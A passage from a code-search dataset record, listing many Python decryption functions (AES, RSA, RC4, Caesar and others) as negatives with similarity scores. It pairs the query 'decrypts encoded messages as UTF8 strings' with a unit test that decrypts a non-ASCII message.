line.split()[0] + \" \"\r\n if middle_dot == True: decrypted_message = decrypted_message[:-1] + \".\" * middle_dot_counter + \" \"\r\n if middle_question == True: decrypted_message = decrypted_message[:-1] + \"?\" * middle_question_counter + \" \"\r\n if middle_comma == True: decrypted_message = decrypted_message[:-1] + \",\" * middle_comma_counter + \" \"\r\n checked = True\r\n break\r\n\r\n if checked != True:\r\n decrypted_message += message_word + \" \"\r\n if middle_dot == True: decrypted_message = decrypted_message[:-1] + \".\" * middle_dot_counter + \" \"\r\n if middle_question == True: decrypted_message = decrypted_message[:-1] + \"?\" * middle_question_counter + \" \"\r\n if middle_comma == True: decrypted_message = decrypted_message[:-1] + \",\" * middle_comma_counter + \" \"\r\n file.close()\r\n\r\n decrypted_message = decrypted_message[:-1]\r\n if final_dot == True:\r\n decrypted_message += '.'*final_dot_counter\r\n elif final_question == True:\r\n decrypted_message += '?'*final_question_counter\r\n elif final_comma == True:\r\n decrypted_message += ','*final_comma_counter\r\n\r\n\r\n first_num = int(decrypted_message[0]) + 1\r\n third_num = int(decrypted_message[2])\r\n\r\n\r\n decrypted_message = decrypted_message.split(' ', first_num)[first_num]\r\n decrypted_message = ' '.join(decrypted_message.split()[:-third_num])\r\n\r\n return decrypted_message", "def decrypt(self, cypher):\n\n cypher = b64decode(cypher)\n key_private = RsaPrivateKey.Read(self.crypt_private)\n return key_private.Decrypt(cypher)", "def decrypt(self, value):\n return self._execute(value, task='decrypt')", "def decrypt(self, message: bytearray) -> bytearray:\n return self.__PRGA(message)", "def decrypt(ciphertext):\n base_decode = {'16': base64.b16decode,\n '32': base64.b32decode, '64': base64.b64decode}\n cleartext = ciphertext+''\n for i in range(encrypt_times):\n cleartext = base_decode[get_base(cleartext)](cleartext)\n return cleartext", "def decrypt(self, text):\n\t\tif self.offsets != self.start_off:\n\t\t\traise Exception(\"Current offset != starting offset. Use the reset\"+\\\n\t\t\t\t\t\t\t\" method before decrypting.\")\n\t\treturn self.encrypt(text)", "def decrypt_caesar(ciphertext):\n return ''.join([cipher_to_plain[old] for old in ciphertext.upper()])", "def do_android_decryption(self):\r\n self.aes_decryption_key = self.extract_aes_key()\r\n self.decrypt_device_file()\r\n # join is optimized and does not cause O(n^2) total memory copies.\r\n self.decrypted_file = b\"\\n\".join(self.good_lines)", "def decrypt(cls, ciphertext_and_tag, aad, key, iv):", "def decrypt(self, encrypted_token: bytes) -> bytes:\n return None", "def test_decrypt_key(self):\n key = b'0' * 32\n\n encrypted = encrypt('message', key=key)\n assert decrypt(encrypted, key=key) == 'message'", "def decipher(self):\n plaintext = \"\"\n for ct, key_char in zip(self.text, self.key):\n char_index = self.char_block.rows[key_char].index(ct)\n plaintext += self.char_block.alphabet[char_index]\n print(plaintext)", "def decode(self, data):\n return self.__cipher.decrypt(data)", "def decrypt(key, cipher, plaintext):\n\n rsa = Rsa()\n\n try:\n k = TomlKeyFormatter().from_string(key.read())\n\n c = cipher.read()\n p = rsa.decrypt(c, k)\n\n plaintext.write(p)\n\n except KeyFormatError:\n click.echo(\"ERROR: Key is in bad format\")\n\n except DecryptError:\n click.echo(\"ERROR: Key is wrong or message was badly padded before encryption\")", "def decrypt(self, key):\n super(MACDataUplinkMessage, self).decrypt(key, dir=0)", "def decrypt(\r\n key: bytes,\r\n cipher_text: bytes,\r\n) -> str:\r\n block_size = 16\r\n iv = cipher_text[:block_size]\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plain_text = cipher.decrypt(cipher_text[block_size:]).decode('utf-8')\r\n return _unpad(plain_text)", "def _decrypt(self, data, key):\n seed1 = key\n seed2 = 0xEEEEEEEE\n result = BytesIO()\n\n for i in range(len(data) // 4):\n seed2 += self.encryption_table[0x400 + (seed1 & 0xFF)]\n seed2 &= 0xFFFFFFFF\n value = struct.unpack(\"<I\", data[i*4:i*4+4])[0]\n value = (value ^ (seed1 + seed2)) & 0xFFFFFFFF\n\n seed1 = ((~seed1 << 0x15) + 0x11111111) | (seed1 >> 0x0B)\n seed1 &= 0xFFFFFFFF\n seed2 = value + seed2 + (seed2 << 5) + 3 & 0xFFFFFFFF\n\n result.write(struct.pack(\"<I\", value))\n\n return result.getvalue()", "def decrypt(ciphertext, key):\n\ttry:\n\t\tfrom Cryptodome.Cipher import AES\n\texcept ImportError:\n\t\tfrom Crypto.Cipher import AES\n\n\tif not isPython2():\n\t\tif isString(ciphertext):\n\t\t\tciphertext = ciphertext.encode(\"latin-1\")\n\t\tif isString(key):\n\t\t\tkey = key.encode(\"latin-1\")\n\t\t\n\tiv = ciphertext[:AES.block_size]\n\tcipher = AES.new(key, AES.MODE_CBC, iv)\n\tplaintext = cipher.decrypt(ciphertext[AES.block_size:])\n\treturn plaintext", "def decrypt(self, msg):\n\n if type(msg) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n return self.gpg.decrypt(msg).data", "def decrypt(phrase, offset):\n return encrypt(phrase, 26 - offset) #Encrypting then decrypting by the same number will in effect encrypt by 26, looping back to the starting letters", "def do_ios_decryption(self):\r\n try:\r\n self.aes_decryption_key = self.extract_aes_key()\r\n except DecryptionKeyInvalidError:\r\n self.aes_decryption_key = self.get_backup_encryption_key()\r\n self.used_ios_decryption_key_cache = True\r\n \r\n self.decrypt_device_file()\r\n # join is optimized and does not cause O(n^2) total memory copies.\r\n self.decrypted_file = b\"\\n\".join(self.good_lines)", "def decrypt(self, string):\n return self.__Cipher(self.OP_DECRYPT).update(string)", "def decrypt(ciphertext):\n # AES decrypt\n iv = ciphertext[:16]\n ciphertext = ciphertext[16:]\n aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(aes.decrypt(ciphertext))", "def decrypt(self, enc, use_base64=True, decode_text=True):\n if use_base64:\n enc = base64.b64decode(enc)\n\n decryptor = self.cipher.decryptor()\n raw = self._unpad(decryptor.update(enc) + decryptor.finalize())\n return raw.decode(\"utf-8\") if decode_text else raw", "def decrypt_block(self, ciphertext):\n assert len(ciphertext) == 16\n\n cipher_state = bytes2matrix(ciphertext)\n\n add_round_key(cipher_state, self._key_matrices[-1])\n inv_shift_rows(cipher_state)\n inv_sub_bytes(cipher_state)\n\n for i in range(self.n_rounds - 1, 0, -1):\n add_round_key(cipher_state, self._key_matrices[i])\n inv_mix_columns(cipher_state)\n inv_shift_rows(cipher_state)\n inv_sub_bytes(cipher_state)\n \n add_round_key(cipher_state, self._key_matrices[0])\n\n return matrix2bytes(cipher_state)", "def Private(self):\n self.Send(self.EncryptString('private\\n'))\n print self.DecryptString(self.Recv(4096))\n print self.DecryptString(self.Recv(4096))", "def decrypt_str(message):\n filename = f'/tmp/{get_temp_filename()}'\n filename_encrypted = f'{filename}.pem'\n filename_plain = f'{filename}.plain'\n pem_file = open(filename_encrypted, 'w')\n pem_file.write(message)\n pem_file.close()\n cmd = [\n \"openssl\",\n \"cms\",\n \"-decrypt\",\n \"-inform\", \"PEM\",\n \"-in\", filename_encrypted,\n \"-inkey\", server_key_files[\"key\"],\n \"-recip\", server_key_files[\"crt\"],\n \"-out\", filename_plain\n ]\n res_text = \"\"\n try:\n exec_cmd(cmd)\n with open(filename_plain, \"r\") as plain:\n res_text = plain.read()\n plain.close()\n os.unlink(filename_plain)\n except (OSError, subprocess.CalledProcessError) as err:\n logging.error(\"decrypt_str failed: %s\", err)\n finally:\n os.unlink(filename_encrypted)\n\n return res_text", "def decrypt(self, buffer):\n try:\n ct = base64.b64decode(buffer)\n except:\n print('f a i l')\n return bytes('fail')\n\n cipher = AES.new(self.psk, AES.MODE_GCM, FIXED_IV)\n pt = unpad(cipher.decrypt(ct), AES.block_size)\n return pt", "def decrypt(self, input, iv) :\n pass", "def doDecode(self):\n raise CipherError(\"override this funct and return the decoded msg\")", "def decrypt(self, enc):\n\n enc = base64.b64decode(enc)\n iv = enc[:AES.block_size]\n cipher = AES.new(self.key, AES.MODE_CBC, iv)\n return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8')", "def _decrypt_encrypted_data(encryption_algorithm_info, encrypted_content, password):\n\n decrypt_func = crypto_funcs[encryption_algorithm_info.encryption_cipher]\n\n # Modern, PKCS#5 PBES2-based encryption\n if encryption_algorithm_info.kdf == 'pbkdf2':\n\n if encryption_algorithm_info.encryption_cipher == 'rc5':\n raise ValueError(pretty_message(\n '''\n PBES2 encryption scheme utilizing RC5 encryption is not supported\n '''\n ))\n\n enc_key = pbkdf2(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length\n )\n enc_iv = encryption_algorithm_info.encryption_iv\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pbkdf1':\n derived_output = pbkdf1(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length + 8\n )\n enc_key = derived_output[0:8]\n enc_iv = derived_output[8:16]\n\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n elif encryption_algorithm_info.kdf == 'pkcs12_kdf':\n enc_key = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.key_length,\n 1 # ID 1 is for generating a key\n )\n\n # Since RC4 is a stream cipher, we don't use an IV\n if encryption_algorithm_info.encryption_cipher == 'rc4':\n plaintext = decrypt_func(enc_key, encrypted_content)\n\n else:\n enc_iv = pkcs12_kdf(\n encryption_algorithm_info.kdf_hmac,\n password,\n encryption_algorithm_info.kdf_salt,\n encryption_algorithm_info.kdf_iterations,\n encryption_algorithm_info.encryption_block_size,\n 2 # ID 2 is for generating an IV\n )\n plaintext = decrypt_func(enc_key, encrypted_content, enc_iv)\n\n return plaintext", "def test_endecrypt():\n\n e, d, c = keygen()\n\n test_encryption(e, c)\n test_decryption(d, c)\n key_cracker(e, c)" ]
[ "0.87886894", "0.7859907", "0.7717388", "0.7570975", "0.7548102", "0.74472094", "0.735235", "0.7315939", "0.73016477", "0.7261866", "0.7248655", "0.72426134", "0.71901", "0.7162575", "0.7121405", "0.7052611", "0.7006807", "0.6988077", "0.6984153", "0.6959311", "0.6911666", "0.69018006", "0.6899753", "0.6864132", "0.68637145", "0.6855836", "0.6834609", "0.68262357", "0.682467", "0.6808882", "0.6803807", "0.67877495", "0.67758286", "0.6749758", "0.6731765", "0.67300785", "0.6726871", "0.67248994", "0.67238265", "0.6710899", "0.67099065", "0.6703613", "0.67021793", "0.6689324", "0.6682179", "0.66752", "0.66723615", "0.66508067", "0.66397834", "0.66250914", "0.66250914", "0.6619547", "0.6604124", "0.66004264", "0.6588853", "0.65864044", "0.6583607", "0.65793496", "0.6572421", "0.65723014", "0.65666366", "0.6564202", "0.65622807", "0.655343", "0.65376765", "0.6522979", "0.6521389", "0.6513537", "0.65133196", "0.6503384", "0.6500674", "0.6495827", "0.6493926", "0.6486191", "0.6481308", "0.6474536", "0.645891", "0.64560217", "0.6452325", "0.6438767", "0.6436016", "0.643382", "0.6422242", "0.64179766", "0.64175004", "0.64029133", "0.64020777", "0.6399526", "0.6388853", "0.6384196", "0.6371785", "0.6364399", "0.6360931", "0.6352964", "0.63495225", "0.63491356", "0.63412076", "0.6340102", "0.6339117", "0.6338536" ]
0.72249025
12
It decrypts encoded messages as UTF8 strings.
def test_decrypt_encoding(self): encrypted = encrypt('méssåge') decrypted = decrypt(encrypted) assert decrypted == 'méssåge'
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def decrypt_message(encrypted_message):", "def decrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"decrypt.php\",msg)) as f:\n decryptedmessage = f.read().decode('utf-8',\"strict\")\n return decryptedmessage", "def decrypt(self, data):", "def _decrypt(self, msg):\r\n # they must be real crypto experts at pubnub.com\r\n # two lines of code and two capital mistakes :-(\r\n # pylint: disable=E1101\r\n key = hashlib.sha256(self.cipher).hexdigest()[0:32]\r\n aes = AES.new(key, AES.MODE_CBC, \"0123456789012345\")\r\n decrypted = aes.decrypt(base64.decodestring(msg))\r\n return json.loads(decrypted[0:-ord(decrypted[-1])])", "def decryption(msg):\n \n start_key = 123\n key_increment = 4\n string = []\n decoded = []\n key = start_key\n message = msg\n for c in range(0, len(message)):\n code = ord(message[c])\n change = code-key\n new = chr(change)\n string += new\n key += key_increment\n decoded = ''.join(string)\n return ('Decoded Message:\\t' + decoded)", "def _decrypt_string(self, event):\n _LOGGER.debug(\"Hub: Decrypt String: Original: %s\", str(event.encrypted_content))\n resmsg = self._decrypter.decrypt(unhexlify(event.encrypted_content)).decode(\n encoding=\"UTF-8\", errors=\"replace\"\n )\n _LOGGER.debug(\"Hub: Decrypt String: Decrypted: %s\", resmsg)\n event.parse_decrypted(resmsg)", "def decode_message(self, key):\n\n decoded_message = ''\n for char in self.message:\n if char.isalpha():\n decoded_char = self.convert_char(char, key)\n decoded_message = decoded_message + decoded_char\n else:\n decoded_message = decoded_message + char\n return decoded_message", "def doDecode(self):\n raise CipherError(\"override this funct and return the decoded msg\")", "def decrypt(self, message):\n output = []\n for letter in message:\n # preventing white spaces and numbers\n if letter == ' ' or isinstance(letter, int):\n output.append(letter)\n else:\n idx_in_plain = self.CIPHER_TEXT_ALPH.index(letter.upper())\n output.append(self.PLAIN_TEXT_ALPH[idx_in_plain])\n return \"\".join(output)", "def decrypted(data: str) -> str:\n\n return b64decode(data.encode('ascii')).decode('ascii')", "def decode(self):\n if self.ciphered:\n msg = self.result \n self.result = ''\n else:\n msg = self.msg\n try:\n self.result = self.doDecode(msg,self.shift)\n except Exception as e:\n raise CipherError(\"decoding failure {}.\".format(e))\n self.ciphered = False\n return self.result", "def _decode_text(self):\n\n print(f\"Hex decode; received message is {self.message}\")\n return bytes.fromhex(self.message).decode('utf-8')", "def decrypt_string(self, encrypted_string):\n return self.fernet_instance.decrypt(encrypted_string.encode('utf-8')).decode('utf-8')", "def decrypt(message: str) -> str:\n return \"\".join(REVERSE_DICT[char] for char in message.split())", "def decrypt_message(self):\r\n\r\n\t\t#Will not let user input useless messages that cannot be decrypted.\r\n\t\twhile True:\r\n\t\t\tself.message = input(\"Please enter a message you would like to decrypt. --> \")\r\n\t\t\tif self.message != \"\" and len(self.message) > 4:\r\n\t\t\t\tbreak\r\n\t\t#Decrypts message but verifys correct key before giving user their decrypted message.\r\n\t\tself.right_key = True\r\n\t\twhile self.right_key:\r\n\t\t\tself.setup_key_decrypt()\r\n\t\t\tself.my_code = Decryptor(self.message, self.key).transfer_decrypt()\r\n\t\t\tself.verify_decrypt_key()\r\n\t\tprint(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n\t\tprint(\"Your decrypted message is\")\r\n\t\tprint(self.my_code + \"|\")", "def decrypt_message(data,symetric_key,private_key):\n\tif type(data) == str or type(data) == bytes:\n\t\tdata = json.loads(data)\n\ttyp = data['type']\n\tnonce = data['nonce'].encode(\"iso-8859-1\")\n\tmessage = data['message'].encode(\"iso-8859-1\")\n\tnonce, *_ = decrypt(private_key,nonce)\n\tmessage = AESCCM(symetric_key).decrypt(nonce,message,None)\n\tmessage ={'type':typ,'nonce' : nonce.decode(\"iso-8859-1\"),'message':message.decode(\"iso-8859-1\")}\n\treturn message", "def decipher(s, key): # s = message\n return decipher_raw(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decode(self, data):\n return self.__cipher.decrypt(data)", "def decrypt(self, key, msg, b64decode=True):\n if b64decode:\n msg = base64.b64decode(msg)\n iv = msg[:self.cipher.block_size]\n cipher = self.cipher.new(key, self.cipher.MODE_CBC, iv)\n\n padded = cipher.decrypt(msg[self.cipher.block_size:])\n l = ord(padded[-1:]) + 1\n plain = padded[:-l]\n return plain", "def decode_text():\n print(f\"{YELLOW}[{MIDDLE_DOT}]{RESET} Enter message to decode: \", end=\"\")\n message = input()\n extract_encoded_message = message.split(LEFT_TO_RIGHT_MARK)[1]\n message = extract_encoded_message\n extract_encoded_message = message.split(RIGHT_TO_LEFT_MARK)[0]\n encoded = ''\n decoded = ''\n\n for message_char in message:\n if message_char in zero_space_symbols:\n encoded = encoded + str(zero_space_symbols.index(message_char))\n\n cur_encoded_char = ''\n\n for index, encoded_char in enumerate(encoded):\n cur_encoded_char = cur_encoded_char + encoded_char\n if index > 0 and (index + 1) % padding == 0:\n decoded = decoded + chr(int(cur_encoded_char, len(zero_space_symbols)))\n cur_encoded_char = ''\n\n return decoded", "def decipher2(s, key): # s = message\n return decipher_raw2(s, key).rstrip(bytes('\\x00'.encode('utf-8')))", "def decrypt_message(self, message):\n\t\tf = Fernet(self.key)\n\t\treturn f.decrypt(message)", "def decodeBytesUtf8Safe(self, data):\n N_bytes = len(data)\n\n decoded = \"\"\n while(N_bytes>0):\n try:\n decoded = data[:N_bytes].decode(\"utf-8\")\n except UnicodeDecodeError as ex:\n N_bytes -= 1\n else:\n break\n\n return decoded, data[N_bytes:]", "def decode(keyFile: str, string : str=\"\", inputFile: str=\"\", outputFile:str=\"\") -> str:\n print(\"Decoding message ...\")\n print(\"Is private key file ok ?\", checkKeyFile(keyFile,\"private\"))\n\n if (checkKeyFile(keyFile,\"private\")): \n f = open(keyFile)\n keyData = extractParamsFromKey(f.readlines()[1]) # read the second line of the file and extract the param\n if args.verbose : print(\"keydata (priv) :\", keyData)\n \n # get block length\n blocklen = len(str(keyData[0]))\n if args.verbose : print(\"block size is\",blocklen)\n\n # open a file if the string is empty\n if(string == \"\"):\n # transform hex to string\n string = str(base64ToHexToInt(str(readFile(inputFile))))\n else:\n # transform hex to string\n string = str(base64ToHexToInt(string))\n\n # add padding to have the correct length \n if (len(string) % blocklen != 0):\n if args.verbose : print(\"not the correct legnth\")\n rem = len(string) % blocklen \n if args.verbose : print(rem)\n pad = blocklen - rem\n if args.verbose : print(pad)\n string = string.zfill(len(string)+pad)\n \n blocks = wrap(string, blocklen)\n if args.verbose : print(\"encrypted bloks\", blocks)\n \n # decode for each block\n tmpDecoded = \"\"\n for i in range(len(blocks)): \n blockDecoded = str(calculateDeCrypt(blocks[i], keyData[1], keyData[0]))\n if args.verbose : print(blockDecoded)\n blockDecoded = blockDecoded.zfill(blocklen-1)\n if args.verbose : print(blockDecoded)\n tmpDecoded += blockDecoded\n if args.verbose : print(\"decrypted ints :\", tmpDecoded)\n\n # split the string into blocks\n # start bu reversing the string so we can start left to right\n tmp = tmpDecoded[::-1]\n # cut them\n blocks_ascii = wrap(tmp, 3)\n # reverse the lsit of cut\n blocks_ascii.reverse()\n # inside eecaht cut reserve the characters\n for i in range(len(blocks_ascii)):\n blocks_ascii[i] = blocks_ascii[i][::-1]\n if args.verbose : print(blocks_ascii)\n\n # make sur that every block is the corect length, overwise add padding\n for i in range(len(blocks_ascii)):\n if(len(str(blocks_ascii[i])) != 3):\n if args.verbose : print(\"adding padding for ascii\")\n blocks_ascii[i] = blocks_ascii[i].zfill(3)\n if args.verbose : print(\"blocks after padding :\", blocks_ascii)\n \n string = \"\"\n for c in blocks_ascii:\n string += chr(int(c))\n \n # write the decoded string to a file\n if(outputFile == \"\"):\n print(\"Decrypted :\")\n print(string)\n else :\n writeToFile(outputFile, string)\n return string\n else: \n print(\"keyfile is incorrect\")\n return", "def decode_str(decrypted_text: bytes, encoding: str) -> Tuple[str, str]:\n msg = ''\n out = ''\n if not encoding:\n with warnings.catch_warnings(record=True) as e:\n charset_match = from_bytes(decrypted_text)\n if len(charset_match):\n out = str(charset_match[0])\n demisto.debug(f\"Decode decrypted text using {charset_match[0].encoding} encoding\")\n if e:\n msg = f'Note: encoding detection ended with warning: {e[0].message} Characters may be missing.' \\\n ' You can try running this command again and pass the encoding code as argument.\\n'\n else:\n out = decrypted_text.decode(encoding)\n\n return out, msg", "def decode(self, crypto):", "def decrypt(self, msg):\n\n if type(msg) != type(b''):\n raise ValueError(\"msg should be a byte object!\")\n\n return self.gpg.decrypt(msg).data", "def decode_message(self, raw):\n return raw.decode('utf-8')", "def decrypt_message(encrypted_message):\r\n\r\n # conversion to bytes\r\n encrypted_message = bytes(encrypted_message, \"ascii\")\r\n\r\n # loading key\r\n key = load_key()\r\n\r\n # creating a fernet object\r\n f = Fernet(key)\r\n\r\n # decrypting the messsage\r\n decrypted_message = f.decrypt(encrypted_message)\r\n\r\n return decrypted_message.decode()", "def decrypt_message(self, encrypted_message):\n f = Fernet(bytes(self.key))\n decrypted_message = f.decrypt(encrypted_message)\n return decrypted_message", "def decrypt(self, msg):\n if self.security_type is not None and self.security_type != 0:\n res, used, _ = gss.unwrap(self.ctx, msg)\n isconf = self.security_type == gss.RequirementFlag.confidentiality\n if (not used and isconf):\n raise GSSClientError('User requested encryption, '\n 'but the server sent an unencrypted '\n 'message!')\n return res.decode('utf-8')\n else:\n return msg.decode('utf-8')", "def decode(self, s):", "def decode(self, s):", "def decrypt_str(message):\n filename = f'/tmp/{get_temp_filename()}'\n filename_encrypted = f'{filename}.pem'\n filename_plain = f'{filename}.plain'\n pem_file = open(filename_encrypted, 'w')\n pem_file.write(message)\n pem_file.close()\n cmd = [\n \"openssl\",\n \"cms\",\n \"-decrypt\",\n \"-inform\", \"PEM\",\n \"-in\", filename_encrypted,\n \"-inkey\", server_key_files[\"key\"],\n \"-recip\", server_key_files[\"crt\"],\n \"-out\", filename_plain\n ]\n res_text = \"\"\n try:\n exec_cmd(cmd)\n with open(filename_plain, \"r\") as plain:\n res_text = plain.read()\n plain.close()\n os.unlink(filename_plain)\n except (OSError, subprocess.CalledProcessError) as err:\n logging.error(\"decrypt_str failed: %s\", err)\n finally:\n os.unlink(filename_encrypted)\n\n return res_text", "def __decrypt(string: str) -> str:\n key = 171\n result = \"\"\n i: int\n for i in string:\n a = key ^ i\n key = i\n result += chr(a)\n return result", "def test_decode_messages():\n decoding1 = d.decode()\n decoding2 = s.decode_messages()\n assert decoding1 == decoding2\n decoding3 = SecretGarden(filename, \"HELLO, STUDENTS.\").decode_messages()\n assert decoding1 != decoding3", "def decodeUtf8(self, arrayBuffer):", "def decodeUtf8(self, arrayBuffer):", "def decryptToString(self, data, keyobj):\n return self.decryptByteArray(data, keyobj).decode().split('\\x00')[0]", "def decrypt(self, message):\n message = base64.b64decode(message)\n initialization_vector = message[:self._block_size]\n cipher = AES.new(self._key, AES.MODE_CBC, initialization_vector)\n raw_message = cipher.decrypt(message[self._block_size:])\n return self._remove_padding(raw_message).decode('utf-8')", "def decrypt(event=None): # event is passed by binders.\n msg = inputText.get(\"1.0\",tkinter.END)\n outText.delete('1.0', tkinter.END)\n\n decB64Msg = base64.decodestring(msg)\n\n f = open(myTmpDir + 'ct' + str(identity) + '.bin','wb')\n f.write(decB64Msg)\n f.close()\n\n os.popen(\"rsa.exe d \" + myTmpDir + \"ct\" + str(identity) + \".bin \" + myTmpDir + \"ptSender\" + str(identity) + \".bin\")\n\n with open(myTmpDir + \"ptSender\" + str(identity) + \".bin\", \"rb\") as f:\n readFile = f.read()\n # Convert to hex representation\n decMsg = bytes(readFile)\n\n # TODO: overwirite\n outText.insert(tkinter.END, decMsg)", "def AES_decrypt(ciphertext: bytes) -> Text:\n text = b64decode(ciphertext)\n cipher = AES.new(secret_key, mode, IV)\n return Padding.unpad(cipher.decrypt(text), bs).decode('utf-8')", "def encrypt_message(msg):\n with urllib.request.urlopen(format_url(main_url+\"encrypt.php\",msg)) as f:\n encryptedmessage = f.read().decode('utf-8',\"strict\")\n return encryptedmessage", "def decrypt(self,message, key):\n return self.translateMessage(message, key, \"decrypt\")", "def fernet_decript(key,message):\n\tf = Fernet(key)\n\treturn f.decrypt(message)", "def decrypt(self, text):\n return self.encrypt(text)", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def decrypt_epic(aes_key, encrypted_data):\n # Decode encrypted string\n decoded = base64.b64decode(encrypted_data)\n\n # Decrypt decoded string\n decoded_readable = CryptDecrypt(aes_key, decoded).decode('utf-8')\n return decoded_readable", "def read_message(msg_cipher: bytes, crypto: object) -> Tuple[str, str]:\n\n ciph_in = msg_cipher[:-64]\n hmac = msg_cipher[-64:].decode('utf-8')\n plaintext = crypto.decrypt(ciph_in).decode('utf-8')\n plaintext = plaintext.strip('\\0')\n return plaintext, hmac", "def decrypt(library, message):\r\n\r\n # Make lists of keys and values\r\n keys = []\r\n values = []\r\n for entry in library:\r\n entry = entry.split()\r\n keys.append(entry[1])\r\n values.append(entry[0])\r\n\r\n # Decode the message\r\n decoded = ''\r\n message = message.split()\r\n for m in range(len(message)):\r\n for k in range(len(keys)):\r\n if message[m] == keys[k]:\r\n decoded += values[k]\r\n if message[m] not in keys:\r\n decoded += '?'\r\n return decoded", "def Decrypt(self, data):\n\n data = base64.b64decode(data)\n es = AES.new(self.creds.aesKey, AES.MODE_CBC, self.creds.aesIV)\n solved = \"\"\n try:\n solved = es.decrypt(data)\n except ValueError:\n stdout.write(\"Error, corrupted file.\\n\\n\")\n return \"%errorpass:1234123412341234%\"\n\n return solved", "def de_base64(msg):\n try:\n msg_ascii = msg.encode('ascii')\n msg_bytes = base64.b64decode(msg_ascii)\n msg_decoded = msg_bytes.decode('ascii')\n return msg_decoded\n except:\n print('Invalid base64-encoded string')", "def ecb_decrypt(self, encrypted_data, color):\n msg = b''\n for d in encrypted_data:\n encoded_bytes = d[0] + d[1]\n encoded_int = self.bytes_to_int(encoded_bytes)\n decoded_int = self.power(encoded_int, self.private_key, self.N)\n decoded_byte = self.int_to_bytes(decoded_int, len(d[0]))\n msg += decoded_byte\n return msg", "def decrypt_faces(msg, nkey=key):\n newmsg = msg[:-20]\n obj = DES.new(nkey, DES.MODE_ECB)\n return obj.decrypt(newmsg)", "def cipher_feedback_mode_decode(msg, CEK, IV = int(0).to_bytes(8, 'big')):\n assert(len(CEK) == 32)\n assert(len(IV) == 8)\n last_block = IV\n res = b''\n for i in range(0, len(msg), 8):\n gamma = GOST2814789ECB_encode(last_block, CEK)\n block = msg[i: min(i + 8, len(msg))]\n decrypted_block = b''\n for j in range(len(block)):\n decrypted_block += int(block[j] ^ gamma[j]).to_bytes(1, 'big')\n res += decrypted_block\n last_block = block\n return res", "def decrypt(self, message):\n return self._keypair.decrypt(message)", "def decrypt(self, message: bytearray) -> bytearray:\n return self.__PRGA(message)", "def test_decrypt_encrypted(self):\n encrypted = encrypt('message')\n decrypted = decrypt(encrypted)\n\n assert decrypted == 'message'", "def decrypt(self, enc, use_base64=True, decode_text=True):\n if use_base64:\n enc = base64.b64decode(enc)\n\n decryptor = self.cipher.decryptor()\n raw = self._unpad(decryptor.update(enc) + decryptor.finalize())\n return raw.decode(\"utf-8\") if decode_text else raw", "def decrypt(ciphertext):\n base_decode = {'16': base64.b16decode,\n '32': base64.b32decode, '64': base64.b64decode}\n cleartext = ciphertext+''\n for i in range(encrypt_times):\n cleartext = base_decode[get_base(cleartext)](cleartext)\n return cleartext", "def decrypt_message(message: bytes, receiver_private_key: RsaKey) -> bytes:\n iv = message[:IV_LEN]\n enc_aes_key = message[IV_LEN:IV_LEN + receiver_private_key.size_in_bytes()] # Assume encryption has been done with same key size\n enc_message = message[IV_LEN + receiver_private_key.size_in_bytes():]\n\n cipher_rsa = PKCS1_OAEP.new(receiver_private_key)\n aes_key = cipher_rsa.decrypt(enc_aes_key)\n\n cipher_aes = AES.new(aes_key, AES.MODE_CBC, iv)\n return unpad(cipher_aes.decrypt(enc_message), AES.block_size) # Padding have to be removed", "def decrypt_message(self, cipher):\n\t\tmessage = cipher ** self.private_key % self.hidden_primes_product\n\t\treturn message", "def decrypt(self, message):\r\n\r\n # Example string\r\n message = message.lower()\r\n # Everything we can encrypt\r\n SYMBOLS = \"abcdefghijklmnopqrstuvwxyz\"\r\n\r\n for counter, key in enumerate(range(len(SYMBOLS))):\r\n # try again with each key attempt\r\n translated = \"\"\r\n\r\n for character in message:\r\n if character in SYMBOLS:\r\n symbolIndex = SYMBOLS.find(character)\r\n translatedIndex = symbolIndex - key\r\n\r\n # In the event of wraparound\r\n if translatedIndex < 0:\r\n translatedIndex += len(SYMBOLS)\r\n\r\n translated += SYMBOLS[translatedIndex]\r\n\r\n else:\r\n # Append the symbol without encrypting or decrypting\r\n translated += character\r\n\r\n # Output each attempt\r\n result = self.lc.checkLanguage(translated)\r\n if result:\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": True,\r\n \"Plaintext\": translated,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": f\"The rotation used is {counter}\",\r\n }\r\n # if none of them match English, return false!\r\n return {\r\n \"lc\": self.lc,\r\n \"IsPlaintext?\": False,\r\n \"Plaintext\": None,\r\n \"Cipher\": \"Caesar\",\r\n \"Extra Information\": None,\r\n }", "def test_decodeWithoutFinalASCIIShift(self):\n self.assertEqual(\n b'&AL0'.decode('imap4-utf-7'),\n u\"\\N{VULGAR FRACTION ONE HALF}\",\n )", "def decrypt(crypto, priv):\r\n string = rsa.encrypt(crypto, priv)\r\n string = livingDead.utfE(crypto)\r\n return crypto", "def unescape(msg):\n skip = False\n unescaped = bytearray()\n\n for i in range(len(msg)):\n\n if not skip and msg[i] is 0x7D:\n\n if not (i + 1) >= len(msg):\n unescaped.append(msg[i + 1] ^ 0x20)\n skip = True\n\n elif not skip:\n unescaped.append(msg[i])\n else:\n skip = False\n\n return unescaped", "def decryptstring(enc, 